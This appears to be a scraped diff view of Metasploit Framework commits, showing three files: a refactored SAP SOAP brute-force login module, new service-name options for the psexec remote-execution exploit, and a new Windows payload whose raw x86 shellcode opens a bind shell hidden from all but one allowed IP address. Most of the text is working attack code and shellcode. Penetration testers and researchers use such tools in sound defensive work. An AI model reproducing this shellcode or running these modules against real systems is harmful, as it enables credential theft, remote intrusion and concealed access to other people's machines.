print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
|
||||
elsif !datastore['USERPASS_FILE'].nil?
|
||||
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist")
|
||||
else
|
||||
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist")
|
||||
datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt'
|
||||
end
|
||||
end
|
||||
print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']
|
||||
|
||||
each_user_pass do |user, pass|
|
||||
enum_user(user,pass)
|
||||
enum_user(user,pass,uri)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def enum_user(user, pass)
|
||||
def enum_user(user, pass, uri)
|
||||
|
||||
# Replace placeholder with SAP SID, if present
|
||||
if datastore['SAP_SID'] != ''
|
||||
if datastore['SAP_SID']
|
||||
user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
|
||||
pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
|
||||
end
|
||||
|
||||
print_status("#{rhost}:#{rport} - Trying username:'#{user}' password:'#{pass}'")
|
||||
print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'")
|
||||
success = false
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
|
@ -103,7 +94,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'uri' => uri,
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
|
@ -113,9 +104,9 @@ class Metasploit4 < Msf::Auxiliary
|
|||
'Content-Type' => 'text/xml; charset=UTF-8',
|
||||
'Authorization' => 'Basic ' + user_pass
|
||||
}
|
||||
}, 45)
|
||||
})
|
||||
|
||||
return if not res
|
||||
return unless res
|
||||
|
||||
if (res.code != 500 and res.code != 200)
|
||||
return
|
||||
|
@ -136,17 +127,17 @@ class Metasploit4 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect")
|
||||
print_error("#{peer} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("#{rhost}:#{rport} [SAP] Successful login '#{user}' password: '#{pass}'")
|
||||
print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")
|
||||
|
||||
if permission
|
||||
vprint_good("#{rhost}:#{rport} [SAP] Login '#{user}' authorized to perform OSExecute calls")
|
||||
vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
|
||||
else
|
||||
vprint_error("#{rhost}:#{rport} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
|
||||
vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
|
||||
end
|
||||
|
||||
report_auth_info(
|
||||
|
@ -160,10 +151,9 @@ class Metasploit4 < Msf::Auxiliary
|
|||
:target_host => rhost,
|
||||
:target_port => rport
|
||||
)
|
||||
return
|
||||
else
|
||||
vprint_error("#{rhost}:#{rport} [SAP] failed to login as '#{user}':'#{pass}'")
|
||||
return
|
||||
vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -81,7 +81,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false]),
|
||||
OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
|
||||
OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
|
||||
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
|
||||
OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil]),
|
||||
OptString.new('SERVICE_NAME', [false, "Servicename to to be used on target for the service binary and manager",nil]),
|
||||
OptString.new('SERVICE_DISPLAYNAME', [false, "Service displayname to to be used on target for the service manager",nil])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -180,8 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Disconnect from the ADMIN$
|
||||
simple.disconnect("ADMIN$")
|
||||
else
|
||||
servicename = rand_text_alpha(8)
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
servicedescription = datastore['SERVICE_DESCRIPTION']
|
||||
displayname = datastore['SERVICE_DISPLAYNAME'] || 'M' + rand_text_alpha(rand(32)+1)
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
|
@ -227,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
|
||||
end
|
||||
|
||||
psexec(file_location, false, servicedescription)
|
||||
psexec(file_location, false, servicedescription, servicename, displayname)
|
||||
|
||||
print_status("Deleting \\#{filename}...")
|
||||
sleep(1)
|
||||
|
|
|
@ -0,0 +1,79 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/bind_tcp'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Windows
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Command Shell, Hidden Bind TCP Inline',
|
||||
'Description' => 'Listen for a connection from certain IP and spawn a command shell.
|
||||
The shellcode will reply with a RST packet if the connections is not
|
||||
comming from the IP defined in AHOST. This way the port will appear
|
||||
as "closed" helping us to hide the shellcode.',
|
||||
'Author' =>
|
||||
[
|
||||
'vlad902', # original payload module (single_shell_bind_tcp)
|
||||
'sd', # original payload module (single_shell_bind_tcp)
|
||||
'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden ACL functionality
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::BindTcp,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 200, 'n' ],
|
||||
'AHOST' => [ 262, 'ADDR' ],
|
||||
'EXITFUNC' => [ 363, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
|
||||
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
|
||||
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
|
||||
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
|
||||
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
|
||||
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
|
||||
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
|
||||
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
|
||||
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
|
||||
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
|
||||
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
|
||||
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
|
||||
"\x68\xc2\xdb\x37\x67\xff\xd5\x6a\x01\x54\x68\x02\x30\x00\x00\x68" +
|
||||
"\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" +
|
||||
"\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" +
|
||||
"\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" +
|
||||
"\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" +
|
||||
"\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" +
|
||||
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
|
||||
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" +
|
||||
"\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" +
|
||||
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" +
|
||||
"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +
|
||||
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptAddress.new('AHOST', [true, "IP address allowed", nil])
|
||||
])
|
||||
end
|
||||
|
||||
end
|
||||
|
Loading…
Reference in New Issue